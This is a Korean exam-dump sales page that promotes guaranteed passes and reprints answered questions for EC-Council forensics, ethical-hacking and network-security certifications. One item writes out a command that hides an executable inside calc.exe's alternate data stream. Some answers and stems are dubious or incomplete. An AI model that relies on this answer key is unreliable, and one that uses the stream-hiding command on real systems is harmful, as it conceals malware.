2013년 12월 31일 화요일

EC0-349 덤프 EC-COUNCIL 인증

ITExamDump에서는EC-COUNCIL 인증EC0-349시험대비덤프를 발췌하여 제공해드립니다. EC-COUNCIL 인증EC0-349시험대비덤프에는 시험문제의 모든 예상문제와 시험유형이 포함되어있어 시험준비자료로서 가장 좋은 선택입니다. ITExamDump에서 제공해드리는 전면적인EC-COUNCIL 인증EC0-349시험대비덤프로EC-COUNCIL 인증EC0-349시험준비공부를 해보세요. 통과율이 100%입니다.

ITExamDump는 모든 IT관련 인증시험자료를 제공할 수 있는 사이트입니다. 우리ITExamDump는 여러분들한테 최고 최신의 자료를 제공합니다. ITExamDump을 선택함으로 여러분은 이미EC-COUNCIL EC0-349시험을 패스하였습니다. 우리 자료로 여러분은 충분히EC-COUNCIL EC0-349를 패스할 수 있습니다. 만약 시험에서 떨어지셨다면 우리는 백프로 환불은 약속합니다. 그리고 갱신이 된 최신자료를 보내드립니다. 하지만 이런사례는 거이 없었습니다.모두 한번에 패스하였기 때문이죠. ITExamDump는 여러분이EC-COUNCIL EC0-349인증시험 패스와 추후사업에 모두 도움이 되겠습니다. Pass4Tes의 선택이야말로 여러분의 현명한 선택이라고 볼수 있습니다. Pass4Tes선택으로 여러분은 시간도 절약하고 돈도 절약하는 일석이조의 득을 얻을수 있습니다. 또한 구매후 일년무료 업데이트버전을 바을수 있는 기회를 얻을수 있습니다.

ITExamDump의EC-COUNCIL EC0-349시험자료의 문제와 답이 실제시험의 문제와 답과 아주 비슷합니다. 우리의 짧은 학습가이드로 빠른 시일 내에 관련지식을 터득하여 응시준비를 하게 합니다. 우리는 우리의EC-COUNCIL EC0-349인증시험덤프로 시험패스를 보장합니다.

EC-COUNCIL EC0-349인증시험은 전업적지식이 강한 인증입니다. IT업계에서 일자리를 찾고 계시다면 많은 회사에서는EC-COUNCIL EC0-349있는지 없는지에 알고 싶어합니다. 만약EC-COUNCIL EC0-349자격증이 있으시다면 여러분은 당연히 경쟁력향상입니다.

시험 번호/코드: EC0-349
시험 이름: EC-COUNCIL (Computer Hacking Forensic Investigator)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 374 문항
업데이트: 2013-12-30

EC0-349 덤프무료샘플다운로드하기: http://www.itexamdump.com/EC0-349.html

NO.1 A picture file is recovered from a computer under investigation. During the investigation process, the
file is enlarged 500% to get a better view of its contents. The pictures quality is not degraded at all from
this process. What kind of picture is this file?
A.Raster image
B.Vector image
C.Metafile image
D.Catalog image
Answer: B

EC-COUNCIL dumps   EC0-349   EC0-349   EC0-349

NO.2 While searching through a computer under investigation, you discover numerous files that appear to
have had
the first letter of the file name replaced by
the hex code byte E5h. What does this indicate on the computer?
A.The files have been marked as hidden
B.The files have been marked for deletion
C.The files are corrupt and cannot be recovered
D.The files have been marked as read-only
Answer: B

EC-COUNCIL최신덤프   EC0-349   EC0-349 pdf   EC0-349   EC0-349 dumps

NO.3 In conducting a computer abuse investigation you become aware that the suspect of the investigation
is using ABC Company as his Internet Service Provider (ISP). You contact the ISP and request that they
provide you assistance with your investigation. What assistance can the ISP provide?
A.The ISP can investigate anyone using their service and can provide you with assistance
B.The ISP can investigate computer abuse committed by their employees, but must preserve the privacy
of their ustomers and therefore cannot assist you without a warrant
C.The ISP cannot conduct any type of investigations on anyone and therefore cannot assist you
D.ISPs never maintain log files so they would be of no use to your investigation
Answer: B

EC-COUNCIL자료   EC0-349자료   EC0-349 pdf   EC0-349 dumps   EC0-349기출문제

NO.4 Which forensic investigating concept trails the whole incident from how the attack began to how the
victim was
affected?
A.Point-to-point
B.End-to-end
C.Thorough
D.Complete event analysis
Answer: B

EC-COUNCIL   EC0-349시험문제   EC0-349   EC0-349 pdf   EC0-349인증   EC0-349 dump

NO.5 What hashing method is used to password protect Blackberry devices?
A.AES
B.RC5
C.MD5
D.SHA-1
Answer: D

EC-COUNCIL   EC0-349 dump   EC0-349 pdf   EC0-349   EC0-349

NO.6 In the following Linux command, what is the outfile?
dd if=/usr/bin/personal/file.txt of=/var/bin/files/file.txt
A./usr/bin/personal/file.txt
B./var/bin/files/file.txt
C./bin/files/file.txt
D.There is not outfile specified
Answer: B

EC-COUNCIL dumps   EC0-349   EC0-349

NO.7 When carrying out a forensics investigation, why should you never delete a partition on a dynamic
disk?
A.All virtual memory will be deleted
B.The wrong partition may be set to active
C.This action can corrupt the disk
D.The computer will be set in a constant reboot state
Answer: C

EC-COUNCIL pdf   EC0-349시험문제   EC0-349   EC0-349

NO.8 The efforts to obtain information before a trial by demanding documents, depositions, questions and
answers written under oath, written requests for admissions of fact, and examination of the scene is a
description of what legal term?
A.Detection
B.Hearsay
C.Spoliation
D.Discovery
Answer: D

EC-COUNCIL   EC0-349   EC0-349 dumps   EC0-349자료   EC0-349 dump   EC0-349시험문제

NO.9 What information do you need to recover when searching a victims computer for a crime committed
with
specific e-mail message?
A.Internet service provider information
B.E-mail header
C.Username and password
D.Firewall log
Answer: B

EC-COUNCIL최신덤프   EC0-349자격증   EC0-349인증   EC0-349 pdf   EC0-349기출문제

NO.10 A forensics investigator is searching the hard drive of a computer for files that were recently moved to
the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find
anything. What is the reason for this?
A.He should search in C:\Windows\System32\RECYCLED folder
B.The Recycle Bin does not exist on the hard drive
C.The files are hidden and he must use a switch to view them
D.Only FAT system contains RECYCLED folder and not NTFS
Answer: C

EC-COUNCIL   EC0-349기출문제   EC0-349자료   EC0-349 pdf   EC0-349자료

NO.11 A suspect is accused of violating the acceptable use of computing resources, as he has visited adult
websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit
these sites. However, the suspect has cleared the search history and emptied the cookie cache.
Moreover, he has removed any images he might have downloaded. What can the investigator do to prove
the violation? Choose the most feasible option.
A.Image the disk and try to recover deleted files
B.Seek the help of co-workers who are eye-witnesses
C.Check the Windows registry for connection data (You may or may not recover)
D.Approach the websites for evidence
Answer: A

EC-COUNCIL   EC0-349   EC0-349   EC0-349

NO.12 Madison is on trial for allegedly breaking into her universitys internal network. The police raided her
dorm room and seized all of her computer equipment. Madisons lawyer is trying to convince the judge that
the seizure was unfounded and baseless. Under which US Amendment is Madisons lawyer trying to
prove the police violated?
A.The 10th Amendment
B.The 5th Amendment
C.The 1st Amendment
D.The 4th Amendment
Answer: D

EC-COUNCIL인증   EC0-349   EC0-349

NO.13 You are working as an independent computer forensics investigator and receive a call from a systems
administrator for a local school system requesting
your assistance. One of the students at the local high school is suspected of downloading inappropriate
images from the Internet to a PC in the Computer Lab.
When you arrive at the school, the systems administrator hands you a hard drive and tells you that he
made a simple backup copy of the hard drive in the PC
and put it on this drive and requests that you examine the drive for evidence of the suspected images. You
inform him that a simple backup copy will not provide deleted files or recover file fragments. What type of
copy do you need to make to ensure that the evidence found is complete and admissible in future
proceedings?
A.Bit-stream copy
B.Robust copy
C.Full backup copy
D.Incremental backup copy
Answer: A

EC-COUNCIL   EC0-349인증   EC0-349 dumps   EC0-349

NO.14 What is the last bit of each pixel byte in an image called?
A.Last significant bit
B.Least significant bit
C.Least important bit
D.Null bit
Answer: B

EC-COUNCIL자격증   EC0-349   EC0-349기출문제   EC0-349

NO.15 When a router receives an update for its routing table, what is the metric value change to that path?
A.Increased by 2
B.Decreased by 1
C.Increased by 1
D.Decreased by 2
Answer: C

EC-COUNCIL   EC0-349   EC0-349 dump

NO.16 What will the following Linux command accomplish?
dd if=/dev/mem of=/home/sam/mem.bin bs=1024
A.Copy the master boot record to a file
B.Copy the contents of the system folder mem to a file
C.Copy the running memory to a file
D.Copy the memory dump file to an image file
Answer: C

EC-COUNCIL dumps   EC0-349 pdf   EC0-349시험문제

NO.17 Which legal document allows law enforcement to search an office, place of business, or other locale for
evidence relating to an alleged crime?
A.Search warrant
B.Subpoena
C.Wire tap
D.Bench warrant
Answer: A

EC-COUNCIL시험문제   EC0-349덤프   EC0-349

NO.18 Sectors in hard disks typically contain how many bytes?
A.256
B.512
C.1024
D.2048
Answer: B

EC-COUNCIL   EC0-349   EC0-349

NO.19 A forensics investigator needs to copy data from a computer to some type of removable media so he
can
examine the information at another location. The
problem is that the data is around 42GB in size. What type of removable media could the investigator
use?
A.Blu-Ray single-layer
B.HD-DVD
C.Blu-Ray dual-layer
D.DVD-18
Answer: C

EC-COUNCIL   EC0-349   EC0-349 dump   EC0-349 pdf

NO.20 Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows
computer?
A.The data is still present until the original location of the file is used
B.The data is moved to the Restore directory and is kept there indefinitely
C.The data will reside in the L2 cache on a Windows computer until it is manually deleted
D.It is not possible to recover data that has been emptied from the Recycle Bin
Answer: A

EC-COUNCIL pdf   EC0-349   EC0-349   EC0-349   EC0-349

ITexamdump의 000-196덤프의 VCE테스트프로그램과 HH0-240덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 IIA-CGAP시험에 대비한 고품질 덤프와 000-318시험 최신버전덤프를 제공해드립니다. 최고품질 NS0-155시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/EC0-349.html

EC-COUNCIL 자격증 EC0-350 시험덤프

IT자격증을 많이 취득하여 IT업계에서 자신만의 단단한 자리를 보장하는것이 여러분들의 로망이 아닐가 싶습니다. ITExamDump의 완벽한 EC-COUNCIL인증 EC0-350덤프는 IT전문가들이 자신만의 노하우와 경험으로 실제EC-COUNCIL인증 EC0-350시험문제에 대비하여 연구제작한 완벽한 작품으로서 100%시험통과율을 보장합니다.

EC-COUNCIL인증 EC0-350시험을 패스해서 자격증을 취득하려고 하는데 시험비며 학원비며 공부자료비며 비용이 만만치 않다구요? 제일 저렴한 가격으로 제일 효과좋은ITExamDump 의 EC-COUNCIL인증 EC0-350덤프를 알고 계시는지요? ITExamDump 의 EC-COUNCIL인증 EC0-350덤프는 최신 시험문제에 근거하여 만들어진 시험준비공부가이드로서 학원공부 필요없이 덤프공부만으로도 시험을 한방에 패스할수 있습니다. 덤프를 구매하신분은 철저한 구매후 서비스도 받을수 있습니다.

우리 ITExamDump에서는 여러분을 위하여 정확하고 우수한 서비스를 제공하였습니다. 여러분의 고민도 덜어드릴 수 있습니다. 빨리 성공하고 빨리EC-COUNCIL EC0-350인증시험을 패스하고 싶으시다면 우리 ITExamDump를 장바구니에 넣으시죠 . ITExamDump는 여러분의 아주 좋은 합습가이드가 될것입니다. ITExamDump로 여러분은 같고 싶은 인증서를 빠른시일내에 얻게될것입니다.

ITExamDump는 많은 IT인사들이EC-COUNCIL인증시험에 참가하고 완벽한EC0-350인증시험자료로 응시하여 안전하게EC-COUNCIL EC0-350인증시험자격증 취득하게 하는 사이트입니다. Pass4Tes의 자료들은 모두 우리의 전문가들이 연구와 노력 하에 만들어진 것이며.그들은 자기만의 지식과 몇 년간의 연구 경험으로 퍼펙트하게 만들었습니다.우리 덤프들은 품질은 보장하며 갱신 또한 아주 빠릅니다.우리의 덤프는 모두 실제시험과 유사하거나 혹은 같은 문제들임을 약속합니다.ITExamDump는 100% 한번에 꼭 고난의도인EC-COUNCIL인증EC0-350시험을 패스하여 여러분의 사업에 많은 도움을 드리겠습니다.

시험 번호/코드: EC0-350
시험 이름: EC-COUNCIL (Ethical hacking and countermeasures)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 878 문항
업데이트: 2013-12-30

EC-COUNCIL인증EC0-350시험은 IT인증시험과목중 가장 인기있는 시험입니다. ITExamDump에서는EC-COUNCIL인증EC0-350시험에 대비한 공부가이드를 발췌하여 IT인사들의 시험공부 고민을 덜어드립니다. ITExamDump에서 발췌한 EC-COUNCIL인증EC0-350덤프는 실제시험의 모든 범위를 커버하고 있고 모든 시험유형이 포함되어 있어 시험준비 공부의 완벽한 선택입니다.

EC0-350 덤프무료샘플다운로드하기: http://www.itexamdump.com/EC0-350.html

NO.1 What file system vulnerability does the following command take advantage of? type
c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe
A.HFS
B.ADS
C.NTFS
D.Backdoor access
Correct:B

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.2 Which of the following built-in C/C++ functions you should avoid to prevent your program from
buffer overflow attacks?
A.strcpy()
B.strcat()
C.streadd()
D.strsock()
Correct:A B C

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.3 Which programming language is NOT vulnerable to buffer overflow attacks?
A.Java
B.ActiveX
C.C++
D.Assembly Language
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.4 Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been
able to spawn an interactive shell and plans to deface the main web page. He first attempts to use
the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts
to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in
which also he remains unsuccessful. What is the probable cause of Bill's problem?
A.The system is a honeypot
B.The HTML file has permissions of read only
C.You cannot use a buffer overflow to deface a web page
D.There is a problem with the shell and he needs to run the attack again
Correct:B

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.5 Samantha has been actively scanning the client network for which she is doing a vulnerability
assessment test. While doing a port scan she notices ports open in the 135 to 139 range. What
protocol is most likely to be listening on those ports?
A.FTP
B.SMB
C.Finger
D.Samba
Correct:B

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.6 Maurine is working as a security consultant for Hinklemeir Associates.She has asked the
Systems Administrator to create a group policy that would not allow null sessions on the network.
The Systems Administrator is fresh out of college and has never heard of null sessions and does
not know what they are used for. Maurine is trying to explain to the Systems Administrator that
hackers will try to create a null session when footprinting the network. Why would an attacker try
to create a null session with a computer on a network?
A.Enumerate users and shares
B.Install a backdoor for later attacks
C.Escalate his/her privileges on the target server
D.To create a user with administrative privileges for later use
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.7 Why is Social Engineering considered attractive by hackers and commonly done by experts in
the field?
A.It is not considered illegal
B.It is done by well-known hackers
C.It is easy and extremely effective to gain information
D.It does not require a computer in order to commit a crime
Correct:C

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.8 Clive is conducting a pen-test and has just port scanned a system on the network. He has
identified the operating system as Linux and been able to elicit responses from ports 23, 25 and
53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 as
running DNS service. The client confirms these findings and attests to the current availability of
the services. When he tries to telnet to port 23 or 25, he gets a blank screen in response. On
typing other commands, he sees only blank spaces or underscores symbols on the screen. What
are you most likely to infer from this?
A.The services are protected by TCP wrappers
B.There is a honeypot running on the scanned machine
C.An attacker has replaced the services with trojaned ones
D.This indicates that the telnet and SMTP server have crashed
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.9 Bill has started to notice some slowness on his network when trying to update his company's
website and while trying to access the website from the Internet. Bill asks the help desk manager
if he has received any calls about slowness from the end users, but the help desk manager says
that he has not. Bill receives a number of calls from customers that cannot access the company
website and cannot purchase anything online. Bill logs on to a couple of his routers and notices
that the logs show network traffic is at an all time high.?He also notices that almost all the traffic
is originating from a specific address. Bill decides to use Geotrace to find out where the suspect
IP is originates from. The Geotrace utility runs a traceroute and finds that the IP is coming from
Panama.?Bill knows that none of his customers are in Panama so he immediately thinks that his
company is under a Denial of Service attack. Now Bill needs to find out more about the originating
IP address. What Internet registry should Bill look in to find the IP address?
A.LACNIC
B.ARIN
C.RIPE LACNIC
D.APNIC
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.10 Lori has just been tasked by her supervisor toonduct vulnerability scan on the corporate
network.She has been instructed to perform a very thorough test of the network to ensure that
there are no security holes on any of the machines.Lori's company does not own any commercial
scanning products, so she decides to download a free one off the Internet.Lori has never done a
vulnerability scan before, so she is unsure of some of the settings available in the software she
downloaded.One of the options is to choose which ports that can be scanned.Lori wants to do
exactly what her boss has told her, but she does not know what ports should be scanned. If Lori is
supposed to scan all known TCP ports, how many ports should she select in the software?
A.65536
B.1024
C.1025
D.Lori should not scan TCP ports, only UDP ports
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.11 What is the purpose of firewalking?
A.It's a technique used to map routers on a network link
B.It's a technique used to discover Wireless network on foot
C.It's a technique used to discover interface in promiscuous mode
D.It's a technique used to discover what rules are configured on a gateway
Correct:D

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.12 Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his
firewall to block password brute force attempts on his network. He enables blocking the intruder's
IP address for a period of 24 hours time after more than three unsuccessful attempts. He is
confident that this rule will secure his network from hackers on the Internet. But he still receives
hundreds of thousands brute-force attempts generated from various IP addresses around the
world. After some investigation he realizes that the intruders are using a proxy somewhere else
on the Internet which has been scripted to enable the random usage of various proxies on each
request so as not to get caught by the firewall rule. Later he adds another rule to his firewall and
enables small sleep on the password attempt so that if the password is incorrect, it would take 45
seconds to return to the user to begin another attempt. Since an intruder may use multiple
machines to brute force the password, he also throttles the number of connections that will be
prepared to accept from a particular IP address. This action will slow the intruder's attempts.
Samuel wants to completely block hackers brute force attempts on his network. What are the
alternatives to defending against possible brute-force password attacks on his site?
A.Enforce a password policy and use account lockouts after three wrong logon attempts even though this
might lock out legit users
B.Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the
intruder so that you can block them at the Firewall manually
C.Enforce complex password policy on your network so that passwords are more difficult to brute force
D.You cannot completely block the intruders attempt if they constantly switch proxies
Correct:D

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.13 Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites.
Bob is willing to share his knowledge to those who are willing to learn, and many have expressed
their interest in learning from him. However, this knowledge has risks associated with it, as the
same knowledge can be used for malevolent attacks as well. In this context, what would be the
most effective method to bridge the knowledge gap between the "black" hats or crackers and the
"white" hats or computer security professionals?
A.Hire more computer security monitoring personnel to monitor computer systems and networks
B.Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards
C.Train more national guard and reservist in the art of computer security to help out in times of emergency
or crises
D.Make obtaining either a computer security certification or accreditation easier to achieve so more
individuals feel that they are a part of something larger than life
Correct:B

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.14 Travis works primarily from home as a medical transcriptionist. He just bought a brand new
Dual Core Pentium computer with over 3 GB of RAM. He uses voice recognition software to help
him transfer what he dictates to electronic documents. The voice recognition software is
processor intensive, which is why he bought the new computer. Travis frequently has to get on
the Internet to do research on what he is working on. After about two months of working on his
new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus
software, anti-spyware software, and always keeps the computer up-to-date with Microsoft
patches. After another month of working on the computer, Travis' computer is even more
noticeably slow. Every once in awhile, Travis also notices a window or two pop-up on his screen,
but they quickly disappear.He has seen these windows show up, even when he has not been on
the Internet. Travis is really worried about his computer because he spent a lot of money on it, and
he depends on it to work. Travis scans his computer with all kinds of software, and cannot find
anything out of the ordinary. Travis decides to go through Windows Explorer and check out the
file system, folder by folder, to see if there is anything he can find. He spends over four hours
pouring over the files and folders and cannot find anything.But, before he gives up, he notices
that his computer only has about 10 GB of free space available.Since his hard drive is a 200 GB
hard drive, Travis thinks this is very odd. Travis downloads Space Monger and adds up the sizes
for all the folders and files on his computer. According to his calculations, he should have around
150 GB of free space. What is mostly likely the cause of Travis' problems?
A.Travis's computer is infected with stealth kernel level rootkit
B.Travis's computer is infected with Stealth Trojan Virus
C.Travis's computer is infected with Self-Replication Worm that fills the hard disk space
D.Logic Bomb is triggered at random times creating hidden data consuming junk files
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.15 What type of port scan is shown below? Scan directed at open port: ClientServer
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23 192.5.2.92:4079 <----NO
RESPONSE------192.5.2.110:23 Scan directed at closed port: ClientServer 192.5.2.92:4079
---------FIN--------->192.5.2.110:23 192.5.2.92:4079<-----RST/ACK----------192.5.2.110:23
A.Idle Scan
B.FIN Scan
C.XMAS Scan
D.Windows Scan
Correct:B

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.16 A program that defends against a port scanner will attempt to:
A.Sends back bogus data to the port scanner
B.Log a violation and recommend use of security-auditing tools
C.Limit access by the scanning system to publicly available ports only
D.Update a firewall rule in real time to prevent the port scan from being completed
Correct:D

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.17 A client has approached you with a penetration test requirement. They are concerned with the
possibility of external threat, and have invested considerable resources in protecting their
Internet exposure. However, their main concern is the possibility of an employee elevating his/her
privileges and gaining access to information outside of their department. What kind of penetration
test would you recommend that would best address the client's concern?
A.A Grey Hat test
B.A Grey Box test
C.A Black Hat test
D.A White Hat test
E.A Black Box test
F.A White Box test
Correct:B

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.18 Mark works as a contractor for the Department of Defense and is in charge of network security.
He has spent the last month securing access to his network from all possible entry points. He has
segmented his network into several subnets and has installed firewalls all over the network. He
has placed very stringent rules on all the firewalls, blocking everything in and out except ports
that must be used. He does need to have port 80 open since his company hosts a website that
must be accessed from the Internet. Mark is fairly confident of his perimeter defenses, but is still
worried about programs like Hping2 that can get into a network through covert channels. How
should mark protect his network from an attacker using Hping2 to scan his internal network?
A.Block ICMP type 13 messages
B.Block all incoming traffic on port 53
C.Block all outgoing traffic on port 53
D.Use stateful inspection on the firewalls
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.19 After a client sends a connection request (SYN) packet to the server, the server will respond
(SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) by
the client. This sequence number is predictable; the attack connects to a service first with its own
IP address, records the sequence number chosen, and then opens a second connection from a
forged IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but
can guess the correct responses. If the source IP address is used for authentication, then the
attacker can use the one-sided communication to break into the server. What attacks can you
successfully launch against a server using the above technique?
A.Session Hijacking attacks
B.Denial of Service attacks
C.Web page defacement attacks
D.IP spoofing attacks
Correct:A

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

NO.20 Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to
allow a host outside of a firewall to connect transparently and securely through the firewall. He
wonders if his firewall has been breached. What would be your inference?
A.Eric's network has been penetrated by a firewall breach
B.The attacker is using the ICMP protocol to have a covert channel
C.Eric has a Wingate package providing FTP redirection on his network
D.Somebody is using SOCKS on the network to communicate through the firewall
Correct:D

EC-COUNCIL자격증   EC0-350 dumps   EC0-350자격증   EC0-350자격증   EC0-350

ITexamdump의 70-323덤프의 VCE테스트프로그램과 C_TFIN52_66덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 HP0-J62시험에 대비한 고품질 덤프와 C-TSCM62-64시험 최신버전덤프를 제공해드립니다. 최고품질 MB3-700시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/EC0-350.html

312-38 덤프 EC-COUNCIL 자격증

EC-COUNCIL 312-38인증시험도 어려울 뿐만 아니라 신청 또한 어렵습니다.EC-COUNCIL 312-38시험은 IT업계에서도 권위가 있고 직위가 있으신 분들이 응시할 수 있는 시험이라고 알고 있습니다. 우리 ITExamDump에서는EC-COUNCIL 312-38관련 학습가이드를 제동합니다. ITExamDump 는 우리만의IT전문가들이 만들어낸EC-COUNCIL 312-38관련 최신, 최고의 자료와 학습가이드를 준비하고 있습니다. 여러분의 편리하게EC-COUNCIL 312-38응시하는데 많은 도움이 될 것입니다.

많은 사이트에서도 무료EC-COUNCIL 312-38덤프데모를 제공합니다. 우리도 마찬가지입니다. 여러분은 그러한EC-COUNCIL 312-38데모들을 보시고 다시 우리의 덤프와 비교하시면, 우리의 덤프는 다른 사이트덤프와 차원이 다른 덤프임을 아사될 것 입니다. 우리 ITExamDump사이트에서 제공되는EC-COUNCIL인증312-38시험덤프의 일부분인 데모 즉 문제와 답을 다운받으셔서 체험해보면 우리ITExamDump에 믿음이 갈 것입니다. 왜냐면 우리 ITExamDump에는 베터랑의 전문가들로 이루어진 연구팀이 잇습니다, 그들은 it지식과 풍부한 경험으로 여러 가지 여러분이EC-COUNCIL인증312-38시험을 패스할 수 있을 자료 등을 만들었습니다 여러분이EC-COUNCIL인증312-38시험에 많은 도움이EC-COUNCIL 312-38될 것입니다. ITExamDump 가 제공하는312-38테스트버전과 문제집은 모두EC-COUNCIL 312-38인증시험에 대하여 충분한 연구 끝에 만든 것이기에 무조건 한번에EC-COUNCIL 312-38시험을 패스하실 수 있습니다. 때문에EC-COUNCIL 312-38덤프의 인기는 당연히 짱 입니다.

우리 ITExamDump에서는 최고이자 최신의EC-COUNCIL 인증312-38덤프자료를 제공 함으로 여러분을 도와EC-COUNCIL 인증312-38인증자격증을 쉽게 취득할 수 있게 해드립니다.만약 아직도EC-COUNCIL 인증312-38시험패스를 위하여 고군분투하고 있다면 바로 우리 ITExamDump를 선택함으로 여러분의 고민을 날려버릴수 있습니다.

EC-COUNCIL인증 312-38시험은 IT업종종사분들에게 널리 알려진 유명한 자격증을 취득할수 있는 시험과목입니다. EC-COUNCIL인증 312-38시험은 영어로 출제되는만큼 시험난이도가 많이 높습니다.하지만 ITExamDump의EC-COUNCIL인증 312-38덤프만 있다면 아무리 어려운 시험도 쉬워집니다. 오르지 못할 산도 정복할수 있는게ITExamDump제품의 우점입니다. ITExamDump의EC-COUNCIL인증 312-38덤프로 시험을 패스하여 자격증을 취득하면 정상에 오를수 있습니다.

시험 번호/코드: 312-38
시험 이름: EC-COUNCIL (EC-Council Network Security Administrator)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 330 문항
업데이트: 2013-12-30

312-38 덤프무료샘플다운로드하기: http://www.itexamdump.com/312-38.html

NO.1 Which of the following is an intrusion detection system that monitors and analyzes the internals of a
computing system rather than the network packets on its external interfaces?
A. IPS
B. HIDS
C. DMZ
D. NIDS
Answer: B

EC-COUNCIL시험문제   312-38인증   312-38덤프

NO.2 Which of the following is a tool that runs on the Windows OS and analyzes iptables log messages to
detect port scans and other suspicious traffic?
A. Nmap
B. Hping
C. NetRanger
D. PSAD
Answer: D

EC-COUNCIL   312-38   312-38

NO.3 CORRECT TEXT
Fill in the blank with the appropriate term. A _______________device is used for uniquely recognizing
humans based upon one or more intrinsic physical or behavioral traits.
Answer: biometric

EC-COUNCIL자료   312-38최신덤프   312-38최신덤프

NO.4 Which of the following protocols is used for exchanging routing information between two gateways in a
network of autonomous systems?
A. IGMP
B. ICMP
C. EGP
D. OSPF
Answer: C

EC-COUNCIL   312-38   312-38자료   312-38자료

NO.5 In which of the following conditions does the system enter ROM monitor mode? Each correct answer
represents a complete solution. Choose all that apply.
A. The router does not have a configuration file.
B. There is a need to set operating parameters.
C. The user interrupts the boot sequence.
D. The router does not find a valid operating system image.
Answer: C,D

EC-COUNCIL덤프   312-38자료   312-38 dump   312-38

NO.6 You are an Administrator for a network at an investment bank. You are concerned about individuals
breeching your network and being able to steal data before you can detect their presence and shut down
their access. Which of the following is the best way to address this issue?
A. Implement a strong password policy.
B. Implement a strong firewall.
C. Implement a honey pot.
D. Implement network based anti virus.
Answer: C

EC-COUNCIL자격증   312-38   312-38   312-38 dumps   312-38   312-38시험문제

NO.7 Which of the following is a protocol that describes an approach to providing "streamlined" support of
OSI application services on top of TCP/IP-based networks for some constrained environments?
A. Network News Transfer Protocol
B. Lightweight Presentation Protocol
C. Internet Relay Chat Protocol
D. Dynamic Host Configuration Protocol
Answer: B

EC-COUNCIL기출문제   312-38   312-38   312-38   312-38덤프

NO.8 DRAG DROP
Drag and drop the terms to match with their descriptions.?
Answer:

NO.9 Which of the following is a process that detects a problem, determines its cause, minimizes the
damages, resolves the problem, and documents each step of response for future reference?
A. Incident response
B. Incident handling
C. Incident management
D. Incident planning
Answer: A

EC-COUNCIL pdf   312-38덤프   312-38   312-38최신덤프   312-38기출문제   312-38

NO.10 John works as a professional Ethical Hacker. He has been assigned the project of testing the security
of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of
the tool is as follows:
Which of the following tools is John using to crack the wireless encryption keys?
A. PsPasswd
B. Kismet
C. AirSnort
D. Cain
Answer: C

EC-COUNCIL최신덤프   312-38   312-38   312-38   312-38 dumps   312-38자료

NO.11 Which of the following is designed to detect the unwanted presence of fire by monitoring
environmental changes associated with combustion?
A. Fire sprinkler
B. Fire suppression system
C. Fire alarm system
D. Gaseous fire suppression
Answer: C

EC-COUNCIL인증   312-38자료   312-38자격증   312-38 dumps   312-38덤프   312-38최신덤프

NO.12 Which of the following is the practice of sending unwanted e-mail messages, frequently with
commercial content, in large quantities to an indiscriminate set of recipients? Each correct answer
represents a complete solution. Choose all that apply.
A. E-mail spam
B. Junk mail
C. Email spoofing
D. Email jamming
Answer: A,B

EC-COUNCIL인증   312-38   312-38 pdf   312-38

NO.13 CORRECT TEXT
Fill in the blank with the appropriate word. The ____________________risk analysis process analyzes
the effect of a risk event deriving a numerical value.
